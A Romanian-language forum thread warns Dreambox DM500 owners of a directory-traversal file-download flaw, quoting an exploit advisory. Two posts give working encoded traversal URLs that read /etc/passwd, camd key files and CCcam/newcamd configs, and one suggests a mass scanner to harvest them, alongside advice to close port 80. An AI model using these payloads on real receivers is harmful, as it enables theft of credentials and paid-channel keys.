Thanks Thanks:  0
Likes Likes:  0
Dislikes Dislikes:  0
Results 1 to 8 of 8

Thread: !!!!Atentie cei care aveti dm500 !!!!!

  1. 16-05-11, 23:35 #1
    ciutura
    ciutura is offline
    Banned
    Join Date
    23 Oct 2009
    Posts
    89
    Mentioned
    0 Post(s)
    Rep Power
    0

    Default !!!!Atentie cei care aveti dm500 !!!!!

    http://www.exploit-db.com/exploits/17279/

    DreamBox DM500(+) Arbitrary File Download Vulnerability

    Vendor: Dream Multimedia GmbH
    Product web page: http://www.dream-multimedia-tv.de
    Affected version: DM500, DM500+, DM500HD and DM500S

    Summary: The Dreambox is a series of Linux-powered
    DVB satellite, terrestrial and cable digital television
    receivers (set-top box).

    Desc: Dreambox suffers from a file download vulnerability
    thru directory traversal with appending the '/' character
    in the HTTP GET method of the affected host address. The
    attacker can get to sensitive information like paid channel
    keys, usernames, passwords, config and plug-ins info, etc.

    Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma
    Reply With Quote Reply With Quote
  2. 17-05-11, 00:34 #2
    zildan
    zildan is online now
    RSP - TEAM zildan's Avatar
    Join Date
    05 Dec 2007
    Location
    Sudul Romaniei
    Posts
    8,542
    Mentioned
    93 Post(s)
    Rep Power
    100

    Default

    Deci nu e presupunere, e crunta realitate.

    Daca aveti portul 80 deschis spre Dm500, sunteti vulnerabili.
    Merg comenzi de genul:

    Code:
     http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
 http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
 http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
 http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00
    evident cu ip-urile voastre si nu chiar identice.
    Last edited by zildan; 17-05-11 at 01:47.
    Reply With Quote Reply With Quote
  3. 17-05-11, 11:27 #3
    zappa
    zappa is offline
    Member Addicted Member
    Join Date
    11 Feb 2007
    Location
    Șoseaua Kiseleff nr. 10
    Posts
    2,498
    Mentioned
    5 Post(s)
    Rep Power
    81

    Default

    Am incercat, dar n-am reusit. Se pare ca e valabil si ptr. DM500+ si DM500 HD.
    meam loat doo camuri
    https://www.youtube.com/watch?v=y0z7fBJsAvY
    Reply With Quote Reply With Quote
  4. 17-05-11, 14:47 #4
    ciutura
    ciutura is offline
    Banned
    Join Date
    23 Oct 2009
    Posts
    89
    Mentioned
    0 Post(s)
    Rep Power
    0

    Default merge

    eu l-am testat si merge
    http://192.168.1.102/%2f..%2f..%2f.....c/CCcam.cfg%00
    http://192.168.1.102/%2f..%2f..%2f.....ewcamd.list%00

    si asa zburati din liniile din dream.
    se poate face frumos un mass scanner care sa ia toate ip-urile dintr-o clasa la purecat si sa salveze tot ce gaseste.
    si DM500* hd sau nu sunt zeci de mii.(foarte multe clone)

    Deci ...puneti sa puneti lacat pe 80 sau mai simplu schimbati portul.(daca vrea sa va gaseasca neaparat cineva da un scann la porturi si tot il gaseste)
    Reply With Quote Reply With Quote
  5. 17-05-11, 15:21 #5
    stargate
    stargate is offline
    Standard RSP member stargate's Avatar
    Join Date
    23 Apr 2007
    Location
    P3X-888
    Posts
    3,754
    Mentioned
    0 Post(s)
    Rep Power
    95

    Default

    mie imi da

    Error 403: Forbidden

    ce neseriosi
    Nota: Vizionarea programelor Pay TV fara un abonament valabil este ilegala
    Discutiile purtate si fisierele disponibile aici sunt ?n scop experimental si educational !
    Reply With Quote Reply With Quote
  6. 17-05-11, 15:44 #6
    qwess
    qwess is offline
    Golden Member qwess's Avatar
    Join Date
    26 Oct 2009
    Location
    Walachia / Paname
    Posts
    823
    Mentioned
    2 Post(s)
    Rep Power
    60

    Default

    am incercat si eu sa vedem ce zice si arata ceva de genul:




    Azbox HD with OpenSPA 3.0 powered by OSCam
    UE46F8000 powered by SamyGO_OSCam




    Reply With Quote Reply With Quote
  7. 17-05-11, 16:22 #7
    ciutura
    ciutura is offline
    Banned
    Join Date
    23 Oct 2009
    Posts
    89
    Mentioned
    0 Post(s)
    Rep Power
    0

    Default x

    depinde si de imagine cred
    Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma
    Reply With Quote Reply With Quote
  8. 17-05-11, 16:37 #8
    stargate
    stargate is offline
    Standard RSP member stargate's Avatar
    Join Date
    23 Apr 2007
    Location
    P3X-888
    Posts
    3,754
    Mentioned
    0 Post(s)
    Rep Power
    95

    Default

    pfuuu si eu ca dobitocul care sunt pe persoana fizica folosesc Nemesis
    Nota: Vizionarea programelor Pay TV fara un abonament valabil este ilegala
    Discutiile purtate si fisierele disponibile aici sunt ?n scop experimental si educational !
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules